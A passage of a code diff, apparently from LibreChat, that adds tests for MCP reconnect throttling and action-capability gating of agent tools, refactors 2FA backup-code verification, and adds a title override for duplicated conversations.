checkOAuthFlowStatus, checkOAuthFlowStatus,
getServerConnectionStatus, getServerConnectionStatus,
createUnavailableToolStub,
} = require('./MCP'); } = require('./MCP');
jest.mock('./Config', () => ({ jest.mock('./Config', () => ({
@ -1098,6 +1099,188 @@ describe('User parameter passing tests', () => {
}); });
}); });
describe('createUnavailableToolStub', () => {
it('should return a tool whose _call returns a valid CONTENT_AND_ARTIFACT two-tuple', async () => {
const stub = createUnavailableToolStub('myTool', 'myServer');
// invoke() goes through langchain's base tool, which checks responseFormat.
// CONTENT_AND_ARTIFACT requires [content, artifact] — a bare string would throw:
// "Tool response format is "content_and_artifact" but the output was not a two-tuple"
const result = await stub.invoke({});
// If we reach here without throwing, the two-tuple format is correct.
// invoke() returns the content portion of [content, artifact] as a string.
expect(result).toContain('temporarily unavailable');
});
});
describe('negative tool cache and throttle interaction', () => {
it('should cache tool as missing even when throttled (cross-user dedup)', async () => {
const mockUser = { id: 'throttle-test-user' };
const mockRes = { write: jest.fn(), flush: jest.fn() };
// First call: reconnect succeeds but tool not found
mockReinitMCPServer.mockResolvedValueOnce({
availableTools: {},
});
await createMCPTool({
res: mockRes,
user: mockUser,
toolKey: `missing-tool${D}cache-dedup-server`,
provider: 'openai',
userMCPAuthMap: {},
availableTools: undefined,
});
// Second call within 10s for DIFFERENT tool on same server:
// reconnect is throttled (returns null), tool is still cached as missing.
// This is intentional: the cache acts as cross-user dedup since the
// throttle is per-user-per-server and can't prevent N different users
// from each triggering their own reconnect.
const result2 = await createMCPTool({
res: mockRes,
user: mockUser,
toolKey: `other-tool${D}cache-dedup-server`,
provider: 'openai',
userMCPAuthMap: {},
availableTools: undefined,
});
expect(result2).toBeDefined();
expect(result2.name).toContain('other-tool');
expect(mockReinitMCPServer).toHaveBeenCalledTimes(1);
});
it('should prevent user B from triggering reconnect when user A already cached the tool', async () => {
const userA = { id: 'cache-user-A' };
const userB = { id: 'cache-user-B' };
const mockRes = { write: jest.fn(), flush: jest.fn() };
// User A: real reconnect, tool not found → cached
mockReinitMCPServer.mockResolvedValueOnce({
availableTools: {},
});
await createMCPTool({
res: mockRes,
user: userA,
toolKey: `shared-tool${D}cross-user-server`,
provider: 'openai',
userMCPAuthMap: {},
availableTools: undefined,
});
expect(mockReinitMCPServer).toHaveBeenCalledTimes(1);
// User B requests the SAME tool within 10s.
// The negative cache is keyed by toolKey (no user prefix), so user B
// gets a cache hit and no reconnect fires. This is the cross-user
// storm protection: without this, user B's unthrottled first request
// would trigger a second reconnect to the same server.
const result = await createMCPTool({
res: mockRes,
user: userB,
toolKey: `shared-tool${D}cross-user-server`,
provider: 'openai',
userMCPAuthMap: {},
availableTools: undefined,
});
expect(result).toBeDefined();
expect(result.name).toContain('shared-tool');
// reinitMCPServer still called only once — user B hit the cache
expect(mockReinitMCPServer).toHaveBeenCalledTimes(1);
});
it('should prevent user B from triggering reconnect for throttle-cached tools', async () => {
const userA = { id: 'storm-user-A' };
const userB = { id: 'storm-user-B' };
const mockRes = { write: jest.fn(), flush: jest.fn() };
// User A: real reconnect for tool-1, tool not found → cached
mockReinitMCPServer.mockResolvedValueOnce({
availableTools: {},
});
await createMCPTool({
res: mockRes,
user: userA,
toolKey: `tool-1${D}storm-server`,
provider: 'openai',
userMCPAuthMap: {},
availableTools: undefined,
});
// User A: tool-2 on same server within 10s → throttled → cached from throttle
await createMCPTool({
res: mockRes,
user: userA,
toolKey: `tool-2${D}storm-server`,
provider: 'openai',
userMCPAuthMap: {},
availableTools: undefined,
});
expect(mockReinitMCPServer).toHaveBeenCalledTimes(1);
// User B requests tool-2 — gets cache hit from the throttle-cached entry.
// Without this caching, user B would trigger a real reconnect since
// user B has their own throttle key and hasn't reconnected yet.
const result = await createMCPTool({
res: mockRes,
user: userB,
toolKey: `tool-2${D}storm-server`,
provider: 'openai',
userMCPAuthMap: {},
availableTools: undefined,
});
expect(result).toBeDefined();
expect(result.name).toContain('tool-2');
// Still only 1 real reconnect — user B was protected by the cache
expect(mockReinitMCPServer).toHaveBeenCalledTimes(1);
});
});
describe('createMCPTools throttle handling', () => {
it('should return empty array with debug log when reconnect is throttled', async () => {
const mockUser = { id: 'throttle-tools-user' };
const mockRes = { write: jest.fn(), flush: jest.fn() };
// First call: real reconnect
mockReinitMCPServer.mockResolvedValueOnce({
tools: [{ name: 'tool1' }],
availableTools: {
[`tool1${D}throttle-tools-server`]: {
function: { description: 'Tool 1', parameters: {} },
},
},
});
await createMCPTools({
res: mockRes,
user: mockUser,
serverName: 'throttle-tools-server',
provider: 'openai',
userMCPAuthMap: {},
});
// Second call within 10s — throttled
const result = await createMCPTools({
res: mockRes,
user: mockUser,
serverName: 'throttle-tools-server',
provider: 'openai',
userMCPAuthMap: {},
});
expect(result).toEqual([]);
// reinitMCPServer called only once — second was throttled
expect(mockReinitMCPServer).toHaveBeenCalledTimes(1);
// Should log at debug level (not warn) for throttled case
expect(logger.debug).toHaveBeenCalledWith(expect.stringContaining('Reconnect throttled'));
});
});
describe('User parameter integrity', () => { describe('User parameter integrity', () => {
it('should preserve user object properties through the call chain', async () => { it('should preserve user object properties through the call chain', async () => {
const complexUser = { const complexUser = {

View file

@ -64,6 +64,26 @@ const { redactMessage } = require('~/config/parsers');
const { findPluginAuthsByKeys } = require('~/models'); const { findPluginAuthsByKeys } = require('~/models');
const { getFlowStateManager } = require('~/config'); const { getFlowStateManager } = require('~/config');
const { getLogStores } = require('~/cache'); const { getLogStores } = require('~/cache');
/**
* Resolves the set of enabled agent capabilities from endpoints config,
* falling back to app-level or default capabilities for ephemeral agents.
* @param {ServerRequest} req
* @param {Object} appConfig
* @param {string} agentId
* @returns {Promise<Set<string>>}
*/
async function resolveAgentCapabilities(req, appConfig, agentId) {
const endpointsConfig = await getEndpointsConfig(req);
let capabilities = new Set(endpointsConfig?.[EModelEndpoint.agents]?.capabilities ?? []);
if (capabilities.size === 0 && isEphemeralAgentId(agentId)) {
capabilities = new Set(
appConfig.endpoints?.[EModelEndpoint.agents]?.capabilities ?? defaultAgentCapabilities,
);
}
return capabilities;
}
/** /**
* Processes the required actions by calling the appropriate tools and returning the outputs. * Processes the required actions by calling the appropriate tools and returning the outputs.
* @param {OpenAIClient} client - OpenAI or StreamRunManager Client. * @param {OpenAIClient} client - OpenAI or StreamRunManager Client.
@ -445,17 +465,11 @@ async function loadToolDefinitionsWrapper({ req, res, agent, streamId = null, to
} }
const appConfig = req.config; const appConfig = req.config;
const endpointsConfig = await getEndpointsConfig(req); const enabledCapabilities = await resolveAgentCapabilities(req, appConfig, agent.id);
let enabledCapabilities = new Set(endpointsConfig?.[EModelEndpoint.agents]?.capabilities ?? []);
if (enabledCapabilities.size === 0 && isEphemeralAgentId(agent.id)) {
enabledCapabilities = new Set(
appConfig.endpoints?.[EModelEndpoint.agents]?.capabilities ?? defaultAgentCapabilities,
);
}
const checkCapability = (capability) => enabledCapabilities.has(capability); const checkCapability = (capability) => enabledCapabilities.has(capability);
const areToolsEnabled = checkCapability(AgentCapabilities.tools); const areToolsEnabled = checkCapability(AgentCapabilities.tools);
const actionsEnabled = checkCapability(AgentCapabilities.actions);
const deferredToolsEnabled = checkCapability(AgentCapabilities.deferred_tools); const deferredToolsEnabled = checkCapability(AgentCapabilities.deferred_tools);
const filteredTools = agent.tools?.filter((tool) => { const filteredTools = agent.tools?.filter((tool) => {
@ -468,7 +482,10 @@ async function loadToolDefinitionsWrapper({ req, res, agent, streamId = null, to
if (tool === Tools.web_search) { if (tool === Tools.web_search) {
return checkCapability(AgentCapabilities.web_search); return checkCapability(AgentCapabilities.web_search);
} }
if (!areToolsEnabled && !tool.includes(actionDelimiter)) { if (tool.includes(actionDelimiter)) {
return actionsEnabled;
}
if (!areToolsEnabled) {
return false; return false;
} }
return true; return true;
@ -765,6 +782,7 @@ async function loadToolDefinitionsWrapper({ req, res, agent, streamId = null, to
toolContextMap, toolContextMap,
toolDefinitions, toolDefinitions,
hasDeferredTools, hasDeferredTools,
actionsEnabled,
}; };
} }
@ -808,14 +826,7 @@ async function loadAgentTools({
} }
const appConfig = req.config; const appConfig = req.config;
const endpointsConfig = await getEndpointsConfig(req); const enabledCapabilities = await resolveAgentCapabilities(req, appConfig, agent.id);
let enabledCapabilities = new Set(endpointsConfig?.[EModelEndpoint.agents]?.capabilities ?? []);
/** Edge case: use defined/fallback capabilities when the "agents" endpoint is not enabled */
if (enabledCapabilities.size === 0 && isEphemeralAgentId(agent.id)) {
enabledCapabilities = new Set(
appConfig.endpoints?.[EModelEndpoint.agents]?.capabilities ?? defaultAgentCapabilities,
);
}
const checkCapability = (capability) => { const checkCapability = (capability) => {
const enabled = enabledCapabilities.has(capability); const enabled = enabledCapabilities.has(capability);
if (!enabled) { if (!enabled) {
@ -832,6 +843,7 @@ async function loadAgentTools({
return enabled; return enabled;
}; };
const areToolsEnabled = checkCapability(AgentCapabilities.tools); const areToolsEnabled = checkCapability(AgentCapabilities.tools);
const actionsEnabled = checkCapability(AgentCapabilities.actions);
let includesWebSearch = false; let includesWebSearch = false;
const _agentTools = agent.tools?.filter((tool) => { const _agentTools = agent.tools?.filter((tool) => {
@ -842,7 +854,9 @@ async function loadAgentTools({
} else if (tool === Tools.web_search) { } else if (tool === Tools.web_search) {
includesWebSearch = checkCapability(AgentCapabilities.web_search); includesWebSearch = checkCapability(AgentCapabilities.web_search);
return includesWebSearch; return includesWebSearch;
} else if (!areToolsEnabled && !tool.includes(actionDelimiter)) { } else if (tool.includes(actionDelimiter)) {
return actionsEnabled;
} else if (!areToolsEnabled) {
return false; return false;
} }
return true; return true;
@ -947,13 +961,15 @@ async function loadAgentTools({
agentTools.push(...additionalTools); agentTools.push(...additionalTools);
if (!checkCapability(AgentCapabilities.actions)) { const hasActionTools = _agentTools.some((t) => t.includes(actionDelimiter));
if (!hasActionTools) {
return { return {
toolRegistry, toolRegistry,
userMCPAuthMap, userMCPAuthMap,
toolContextMap, toolContextMap,
toolDefinitions, toolDefinitions,
hasDeferredTools, hasDeferredTools,
actionsEnabled,
tools: agentTools, tools: agentTools,
}; };
} }
@ -969,6 +985,7 @@ async function loadAgentTools({
toolContextMap, toolContextMap,
toolDefinitions, toolDefinitions,
hasDeferredTools, hasDeferredTools,
actionsEnabled,
tools: agentTools, tools: agentTools,
}; };
} }
@ -1101,6 +1118,7 @@ async function loadAgentTools({
userMCPAuthMap, userMCPAuthMap,
toolDefinitions, toolDefinitions,
hasDeferredTools, hasDeferredTools,
actionsEnabled,
tools: agentTools, tools: agentTools,
}; };
} }
@ -1118,9 +1136,11 @@ async function loadAgentTools({
* @param {AbortSignal} [params.signal] - Abort signal * @param {AbortSignal} [params.signal] - Abort signal
* @param {Object} params.agent - The agent object * @param {Object} params.agent - The agent object
* @param {string[]} params.toolNames - Names of tools to load * @param {string[]} params.toolNames - Names of tools to load
* @param {Map} [params.toolRegistry] - Tool registry
* @param {Record<string, Record<string, string>>} [params.userMCPAuthMap] - User MCP auth map * @param {Record<string, Record<string, string>>} [params.userMCPAuthMap] - User MCP auth map
* @param {Object} [params.tool_resources] - Tool resources * @param {Object} [params.tool_resources] - Tool resources
* @param {string|null} [params.streamId] - Stream ID for web search callbacks * @param {string|null} [params.streamId] - Stream ID for web search callbacks
* @param {boolean} [params.actionsEnabled] - Whether the actions capability is enabled
* @returns {Promise<{ loadedTools: Array, configurable: Object }>} * @returns {Promise<{ loadedTools: Array, configurable: Object }>}
*/ */
async function loadToolsForExecution({ async function loadToolsForExecution({
@ -1133,11 +1153,17 @@ async function loadToolsForExecution({
userMCPAuthMap, userMCPAuthMap,
tool_resources, tool_resources,
streamId = null, streamId = null,
actionsEnabled,
}) { }) {
const appConfig = req.config; const appConfig = req.config;
const allLoadedTools = []; const allLoadedTools = [];
const configurable = { userMCPAuthMap }; const configurable = { userMCPAuthMap };
if (actionsEnabled === undefined) {
const enabledCapabilities = await resolveAgentCapabilities(req, appConfig, agent?.id);
actionsEnabled = enabledCapabilities.has(AgentCapabilities.actions);
}
const isToolSearch = toolNames.includes(AgentConstants.TOOL_SEARCH); const isToolSearch = toolNames.includes(AgentConstants.TOOL_SEARCH);
const isPTC = toolNames.includes(AgentConstants.PROGRAMMATIC_TOOL_CALLING); const isPTC = toolNames.includes(AgentConstants.PROGRAMMATIC_TOOL_CALLING);
@ -1194,7 +1220,6 @@ async function loadToolsForExecution({
const actionToolNames = allToolNamesToLoad.filter((name) => name.includes(actionDelimiter)); const actionToolNames = allToolNamesToLoad.filter((name) => name.includes(actionDelimiter));
const regularToolNames = allToolNamesToLoad.filter((name) => !name.includes(actionDelimiter)); const regularToolNames = allToolNamesToLoad.filter((name) => !name.includes(actionDelimiter));
/** @type {Record<string, unknown>} */
if (regularToolNames.length > 0) { if (regularToolNames.length > 0) {
const includesWebSearch = regularToolNames.includes(Tools.web_search); const includesWebSearch = regularToolNames.includes(Tools.web_search);
const webSearchCallbacks = includesWebSearch ? createOnSearchResults(res, streamId) : undefined; const webSearchCallbacks = includesWebSearch ? createOnSearchResults(res, streamId) : undefined;
@ -1225,7 +1250,7 @@ async function loadToolsForExecution({
} }
} }
if (actionToolNames.length > 0 && agent) { if (actionToolNames.length > 0 && agent && actionsEnabled) {
const actionTools = await loadActionToolsForExecution({ const actionTools = await loadActionToolsForExecution({
req, req,
res, res,
@ -1235,6 +1260,11 @@ async function loadToolsForExecution({
actionToolNames, actionToolNames,
}); });
allLoadedTools.push(...actionTools); allLoadedTools.push(...actionTools);
} else if (actionToolNames.length > 0 && agent && !actionsEnabled) {
logger.warn(
`[loadToolsForExecution] Capability "${AgentCapabilities.actions}" disabled. ` +
`Skipping action tool execution. User: ${req.user.id} | Agent: ${agent.id} | Tools: ${actionToolNames.join(', ')}`,
);
} }
if (isPTC && allLoadedTools.length > 0) { if (isPTC && allLoadedTools.length > 0) {
@ -1395,4 +1425,5 @@ module.exports = {
loadAgentTools, loadAgentTools,
loadToolsForExecution, loadToolsForExecution,
processRequiredActions, processRequiredActions,
resolveAgentCapabilities,
}; };

View file

@ -1,19 +1,304 @@
const { const {
Tools,
Constants, Constants,
EModelEndpoint,
actionDelimiter,
AgentCapabilities, AgentCapabilities,
defaultAgentCapabilities, defaultAgentCapabilities,
} = require('librechat-data-provider'); } = require('librechat-data-provider');
/** const mockGetEndpointsConfig = jest.fn();
* Tests for ToolService capability checking logic. const mockGetMCPServerTools = jest.fn();
* The actual loadAgentTools function has many dependencies, so we test const mockGetCachedTools = jest.fn();
* the capability checking logic in isolation. jest.mock('~/server/services/Config', () => ({
*/ getEndpointsConfig: (...args) => mockGetEndpointsConfig(...args),
describe('ToolService - Capability Checking', () => { getMCPServerTools: (...args) => mockGetMCPServerTools(...args),
getCachedTools: (...args) => mockGetCachedTools(...args),
}));
const mockLoadToolDefinitions = jest.fn();
const mockGetUserMCPAuthMap = jest.fn();
jest.mock('@librechat/api', () => ({
...jest.requireActual('@librechat/api'),
loadToolDefinitions: (...args) => mockLoadToolDefinitions(...args),
getUserMCPAuthMap: (...args) => mockGetUserMCPAuthMap(...args),
}));
const mockLoadToolsUtil = jest.fn();
jest.mock('~/app/clients/tools/util', () => ({
loadTools: (...args) => mockLoadToolsUtil(...args),
}));
const mockLoadActionSets = jest.fn();
jest.mock('~/server/services/Tools/credentials', () => ({
loadAuthValues: jest.fn().mockResolvedValue({}),
}));
jest.mock('~/server/services/Tools/search', () => ({
createOnSearchResults: jest.fn(),
}));
jest.mock('~/server/services/Tools/mcp', () => ({
reinitMCPServer: jest.fn(),
}));
jest.mock('~/server/services/Files/process', () => ({
processFileURL: jest.fn(),
uploadImageBuffer: jest.fn(),
}));
jest.mock('~/app/clients/tools/util/fileSearch', () => ({
primeFiles: jest.fn().mockResolvedValue({}),
}));
jest.mock('~/server/services/Files/Code/process', () => ({
primeFiles: jest.fn().mockResolvedValue({}),
}));
jest.mock('../ActionService', () => ({
loadActionSets: (...args) => mockLoadActionSets(...args),
decryptMetadata: jest.fn(),
createActionTool: jest.fn(),
domainParser: jest.fn(),
}));
jest.mock('~/server/services/Threads', () => ({
recordUsage: jest.fn(),
}));
jest.mock('~/models', () => ({
findPluginAuthsByKeys: jest.fn(),
}));
jest.mock('~/config', () => ({
getFlowStateManager: jest.fn(() => ({})),
}));
jest.mock('~/cache', () => ({
getLogStores: jest.fn(() => ({})),
}));
const {
loadAgentTools,
loadToolsForExecution,
resolveAgentCapabilities,
} = require('../ToolService');
function createMockReq(capabilities) {
return {
user: { id: 'user_123' },
config: {
endpoints: {
[EModelEndpoint.agents]: {
capabilities,
},
},
},
};
}
function createEndpointsConfig(capabilities) {
return {
[EModelEndpoint.agents]: { capabilities },
};
}
describe('ToolService - Action Capability Gating', () => {
beforeEach(() => {
jest.clearAllMocks();
mockLoadToolDefinitions.mockResolvedValue({
toolDefinitions: [],
toolRegistry: new Map(),
hasDeferredTools: false,
});
mockLoadToolsUtil.mockResolvedValue({ loadedTools: [], toolContextMap: {} });
mockLoadActionSets.mockResolvedValue([]);
});
describe('resolveAgentCapabilities', () => {
it('should return capabilities from endpoints config', async () => {
const capabilities = [AgentCapabilities.tools, AgentCapabilities.actions];
const req = createMockReq(capabilities);
mockGetEndpointsConfig.mockResolvedValue(createEndpointsConfig(capabilities));
const result = await resolveAgentCapabilities(req, req.config, 'agent_123');
expect(result).toBeInstanceOf(Set);
expect(result.has(AgentCapabilities.tools)).toBe(true);
expect(result.has(AgentCapabilities.actions)).toBe(true);
expect(result.has(AgentCapabilities.web_search)).toBe(false);
});
it('should fall back to default capabilities for ephemeral agents with empty config', async () => {
const req = createMockReq(defaultAgentCapabilities);
mockGetEndpointsConfig.mockResolvedValue({});
const result = await resolveAgentCapabilities(req, req.config, Constants.EPHEMERAL_AGENT_ID);
for (const cap of defaultAgentCapabilities) {
expect(result.has(cap)).toBe(true);
}
});
it('should return empty set when no capabilities and not ephemeral', async () => {
const req = createMockReq([]);
mockGetEndpointsConfig.mockResolvedValue({});
const result = await resolveAgentCapabilities(req, req.config, 'agent_123');
expect(result.size).toBe(0);
});
});
describe('loadAgentTools (definitionsOnly=true) — action tool filtering', () => {
const actionToolName = `get_weather${actionDelimiter}api_example_com`;
const regularTool = 'calculator';
it('should exclude action tools from definitions when actions capability is disabled', async () => {
const capabilities = [AgentCapabilities.tools, AgentCapabilities.web_search];
const req = createMockReq(capabilities);
mockGetEndpointsConfig.mockResolvedValue(createEndpointsConfig(capabilities));
await loadAgentTools({
req,
res: {},
agent: { id: 'agent_123', tools: [regularTool, actionToolName] },
definitionsOnly: true,
});
expect(mockLoadToolDefinitions).toHaveBeenCalledTimes(1);
const [callArgs] = mockLoadToolDefinitions.mock.calls[0];
expect(callArgs.tools).toContain(regularTool);
expect(callArgs.tools).not.toContain(actionToolName);
});
it('should include action tools in definitions when actions capability is enabled', async () => {
const capabilities = [AgentCapabilities.tools, AgentCapabilities.actions];
const req = createMockReq(capabilities);
mockGetEndpointsConfig.mockResolvedValue(createEndpointsConfig(capabilities));
await loadAgentTools({
req,
res: {},
agent: { id: 'agent_123', tools: [regularTool, actionToolName] },
definitionsOnly: true,
});
expect(mockLoadToolDefinitions).toHaveBeenCalledTimes(1);
const [callArgs] = mockLoadToolDefinitions.mock.calls[0];
expect(callArgs.tools).toContain(regularTool);
expect(callArgs.tools).toContain(actionToolName);
});
it('should return actionsEnabled in the result', async () => {
const capabilities = [AgentCapabilities.tools];
const req = createMockReq(capabilities);
mockGetEndpointsConfig.mockResolvedValue(createEndpointsConfig(capabilities));
const result = await loadAgentTools({
req,
res: {},
agent: { id: 'agent_123', tools: [regularTool] },
definitionsOnly: true,
});
expect(result.actionsEnabled).toBe(false);
});
});
describe('loadAgentTools (definitionsOnly=false) — action tool filtering', () => {
const actionToolName = `get_weather${actionDelimiter}api_example_com`;
const regularTool = 'calculator';
it('should not load action sets when actions capability is disabled', async () => {
const capabilities = [AgentCapabilities.tools, AgentCapabilities.web_search];
const req = createMockReq(capabilities);
mockGetEndpointsConfig.mockResolvedValue(createEndpointsConfig(capabilities));
await loadAgentTools({
req,
res: {},
agent: { id: 'agent_123', tools: [regularTool, actionToolName] },
definitionsOnly: false,
});
expect(mockLoadActionSets).not.toHaveBeenCalled();
});
it('should load action sets when actions capability is enabled and action tools present', async () => {
const capabilities = [AgentCapabilities.tools, AgentCapabilities.actions];
const req = createMockReq(capabilities);
mockGetEndpointsConfig.mockResolvedValue(createEndpointsConfig(capabilities));
await loadAgentTools({
req,
res: {},
agent: { id: 'agent_123', tools: [regularTool, actionToolName] },
definitionsOnly: false,
});
expect(mockLoadActionSets).toHaveBeenCalledWith({ agent_id: 'agent_123' });
});
});
describe('loadToolsForExecution — action tool gating', () => {
const actionToolName = `get_weather${actionDelimiter}api_example_com`;
const regularTool = Tools.web_search;
it('should skip action tool loading when actionsEnabled=false', async () => {
const req = createMockReq([]);
req.config = {};
const result = await loadToolsForExecution({
req,
res: {},
agent: { id: 'agent_123' },
toolNames: [regularTool, actionToolName],
actionsEnabled: false,
});
expect(mockLoadActionSets).not.toHaveBeenCalled();
expect(result.loadedTools).toBeDefined();
});
it('should load action tools when actionsEnabled=true', async () => {
const req = createMockReq([AgentCapabilities.actions]);
req.config = {};
await loadToolsForExecution({
req,
res: {},
agent: { id: 'agent_123' },
toolNames: [actionToolName],
actionsEnabled: true,
});
expect(mockLoadActionSets).toHaveBeenCalledWith({ agent_id: 'agent_123' });
});
it('should resolve actionsEnabled from capabilities when not explicitly provided', async () => {
const capabilities = [AgentCapabilities.tools];
const req = createMockReq(capabilities);
mockGetEndpointsConfig.mockResolvedValue(createEndpointsConfig(capabilities));
await loadToolsForExecution({
req,
res: {},
agent: { id: 'agent_123' },
toolNames: [actionToolName],
});
expect(mockGetEndpointsConfig).toHaveBeenCalled();
expect(mockLoadActionSets).not.toHaveBeenCalled();
});
it('should not call loadActionSets when there are no action tools', async () => {
const req = createMockReq([AgentCapabilities.actions]);
req.config = {};
await loadToolsForExecution({
req,
res: {},
agent: { id: 'agent_123' },
toolNames: [regularTool],
actionsEnabled: true,
});
expect(mockLoadActionSets).not.toHaveBeenCalled();
});
});
describe('checkCapability logic', () => { describe('checkCapability logic', () => {
/**
* Simulates the checkCapability function from loadAgentTools
*/
const createCheckCapability = (enabledCapabilities, logger = { warn: jest.fn() }) => { const createCheckCapability = (enabledCapabilities, logger = { warn: jest.fn() }) => {
return (capability) => { return (capability) => {
const enabled = enabledCapabilities.has(capability); const enabled = enabledCapabilities.has(capability);
@ -124,10 +409,6 @@ describe('ToolService - Capability Checking', () => {
}); });
describe('userMCPAuthMap gating', () => { describe('userMCPAuthMap gating', () => {
/**
* Simulates the guard condition used in both loadToolDefinitionsWrapper
* and loadAgentTools to decide whether getUserMCPAuthMap should be called.
*/
const shouldFetchMCPAuth = (tools) => const shouldFetchMCPAuth = (tools) =>
tools?.some((t) => t.includes(Constants.mcp_delimiter)) ?? false; tools?.some((t) => t.includes(Constants.mcp_delimiter)) ?? false;
@ -178,20 +459,17 @@ describe('ToolService - Capability Checking', () => {
return (capability) => enabledCapabilities.has(capability); return (capability) => enabledCapabilities.has(capability);
}; };
// When deferred_tools is in capabilities
const withDeferred = new Set([AgentCapabilities.deferred_tools, AgentCapabilities.tools]); const withDeferred = new Set([AgentCapabilities.deferred_tools, AgentCapabilities.tools]);
const checkWithDeferred = createCheckCapability(withDeferred); const checkWithDeferred = createCheckCapability(withDeferred);
expect(checkWithDeferred(AgentCapabilities.deferred_tools)).toBe(true); expect(checkWithDeferred(AgentCapabilities.deferred_tools)).toBe(true);
// When deferred_tools is NOT in capabilities
const withoutDeferred = new Set([AgentCapabilities.tools, AgentCapabilities.actions]); const withoutDeferred = new Set([AgentCapabilities.tools, AgentCapabilities.actions]);
const checkWithoutDeferred = createCheckCapability(withoutDeferred); const checkWithoutDeferred = createCheckCapability(withoutDeferred);
expect(checkWithoutDeferred(AgentCapabilities.deferred_tools)).toBe(false); expect(checkWithoutDeferred(AgentCapabilities.deferred_tools)).toBe(false);
}); });
it('should use defaultAgentCapabilities when no capabilities configured', () => { it('should use defaultAgentCapabilities when no capabilities configured', () => {
// Simulates the fallback behavior in loadAgentTools const endpointsConfig = {};
const endpointsConfig = {}; // No capabilities configured
const enabledCapabilities = new Set( const enabledCapabilities = new Set(
endpointsConfig?.capabilities ?? defaultAgentCapabilities, endpointsConfig?.capabilities ?? defaultAgentCapabilities,
); );

View file

@ -153,9 +153,11 @@ const generateBackupCodes = async (count = 10) => {
* @param {Object} params * @param {Object} params
* @param {Object} params.user * @param {Object} params.user
* @param {string} params.backupCode * @param {string} params.backupCode
* @param {boolean} [params.persist=true] - Whether to persist the used-mark to the database.
* Pass `false` when the caller will immediately overwrite `backupCodes` (e.g. re-enrollment).
* @returns {Promise<boolean>} * @returns {Promise<boolean>}
*/ */
const verifyBackupCode = async ({ user, backupCode }) => { const verifyBackupCode = async ({ user, backupCode, persist = true }) => {
if (!backupCode || !user || !Array.isArray(user.backupCodes)) { if (!backupCode || !user || !Array.isArray(user.backupCodes)) {
return false; return false;
} }
@ -165,17 +167,50 @@ const verifyBackupCode = async ({ user, backupCode }) => {
(codeObj) => codeObj.codeHash === hashedInput && !codeObj.used, (codeObj) => codeObj.codeHash === hashedInput && !codeObj.used,
); );
if (matchingCode) { if (!matchingCode) {
return false;
}
if (persist) {
const updatedBackupCodes = user.backupCodes.map((codeObj) => const updatedBackupCodes = user.backupCodes.map((codeObj) =>
codeObj.codeHash === hashedInput && !codeObj.used codeObj.codeHash === hashedInput && !codeObj.used
? { ...codeObj, used: true, usedAt: new Date() } ? { ...codeObj, used: true, usedAt: new Date() }
: codeObj, : codeObj,
); );
// Update the user record with the marked backup code.
await updateUser(user._id, { backupCodes: updatedBackupCodes }); await updateUser(user._id, { backupCodes: updatedBackupCodes });
return true;
} }
return false; return true;
};
/**
* Verifies a user's identity via TOTP token or backup code.
* @param {Object} params
* @param {Object} params.user - The user document (must include totpSecret and backupCodes).
* @param {string} [params.token] - A 6-digit TOTP token.
* @param {string} [params.backupCode] - An 8-character backup code.
* @param {boolean} [params.persistBackupUse=true] - Whether to mark the backup code as used in the DB.
* @returns {Promise<{ verified: boolean, status?: number, message?: string }>}
*/
const verifyOTPOrBackupCode = async ({ user, token, backupCode, persistBackupUse = true }) => {
if (!token && !backupCode) {
return { verified: false, status: 400 };
}
if (token) {
const secret = await getTOTPSecret(user.totpSecret);
if (!secret) {
return { verified: false, status: 400, message: '2FA secret is missing or corrupted' };
}
const ok = await verifyTOTP(secret, token);
return ok
? { verified: true }
: { verified: false, status: 401, message: 'Invalid token or backup code' };
}
const ok = await verifyBackupCode({ user, backupCode, persist: persistBackupUse });
return ok
? { verified: true }
: { verified: false, status: 401, message: 'Invalid token or backup code' };
}; };
/** /**
@ -213,11 +248,12 @@ const generate2FATempToken = (userId) => {
}; };
module.exports = { module.exports = {
generateTOTPSecret, verifyOTPOrBackupCode,
generateTOTP, generate2FATempToken,
verifyTOTP,
generateBackupCodes, generateBackupCodes,
generateTOTPSecret,
verifyBackupCode, verifyBackupCode,
getTOTPSecret, getTOTPSecret,
generate2FATempToken, generateTOTP,
verifyTOTP,
}; };

View file

@ -358,16 +358,15 @@ function splitAtTargetLevel(messages, targetMessageId) {
* @param {object} params - The parameters for duplicating the conversation. * @param {object} params - The parameters for duplicating the conversation.
* @param {string} params.userId - The ID of the user duplicating the conversation. * @param {string} params.userId - The ID of the user duplicating the conversation.
* @param {string} params.conversationId - The ID of the conversation to duplicate. * @param {string} params.conversationId - The ID of the conversation to duplicate.
* @param {string} [params.title] - Optional title override for the duplicate.
* @returns {Promise<{ conversation: TConversation, messages: TMessage[] }>} The duplicated conversation and messages. * @returns {Promise<{ conversation: TConversation, messages: TMessage[] }>} The duplicated conversation and messages.
*/ */
async function duplicateConversation({ userId, conversationId }) { async function duplicateConversation({ userId, conversationId, title }) {
// Get original conversation
const originalConvo = await getConvo(userId, conversationId); const originalConvo = await getConvo(userId, conversationId);
if (!originalConvo) { if (!originalConvo) {
throw new Error('Conversation not found'); throw new Error('Conversation not found');
} }
// Get original messages
const originalMessages = await getMessages({ const originalMessages = await getMessages({
user: userId, user: userId,
conversationId, conversationId,
@ -383,14 +382,11 @@ async function duplicateConversation({ userId, conversationId }) {
cloneMessagesWithTimestamps(messagesToClone, importBatchBuilder); cloneMessagesWithTimestamps(messagesToClone, importBatchBuilder);
const result = importBatchBuilder.finishConversation( const duplicateTitle = title || originalConvo.title;
originalConvo.title, const result = importBatchBuilder.finishConversation(duplicateTitle, new Date(), originalConvo);
new Date(),
originalConvo,
);
await importBatchBuilder.saveBatch(); await importBatchBuilder.saveBatch();
logger.debug( logger.debug(
`user: ${userId} | New conversation "${originalConvo.title}" duplicated from conversation ID ${conversationId}`, `user: ${userId} | New conversation "${duplicateTitle}" duplicated from conversation ID ${conversationId}`,
); );
const conversation = await getConvo(userId, result.conversation.conversationId); const conversation = await getConvo(userId, result.conversation.conversationId);

View file

@ -1,7 +1,10 @@
const fs = require('fs').promises; const fs = require('fs').promises;
const { resolveImportMaxFileSize } = require('@librechat/api');
const { logger } = require('@librechat/data-schemas'); const { logger } = require('@librechat/data-schemas');
const { getImporter } = require('./importers'); const { getImporter } = require('./importers');
const maxFileSize = resolveImportMaxFileSize();
/** /**
* Job definition for importing a conversation. * Job definition for importing a conversation.
* @param {{ filepath, requestUserId }} job - The job object. * @param {{ filepath, requestUserId }} job - The job object.
@ -11,11 +14,10 @@ const importConversations = async (job) => {
try { try {
logger.debug(`user: ${requestUserId} | Importing conversation(s) from file...`); logger.debug(`user: ${requestUserId} | Importing conversation(s) from file...`);
/* error if file is too large */
const fileInfo = await fs.stat(filepath); const fileInfo = await fs.stat(filepath);
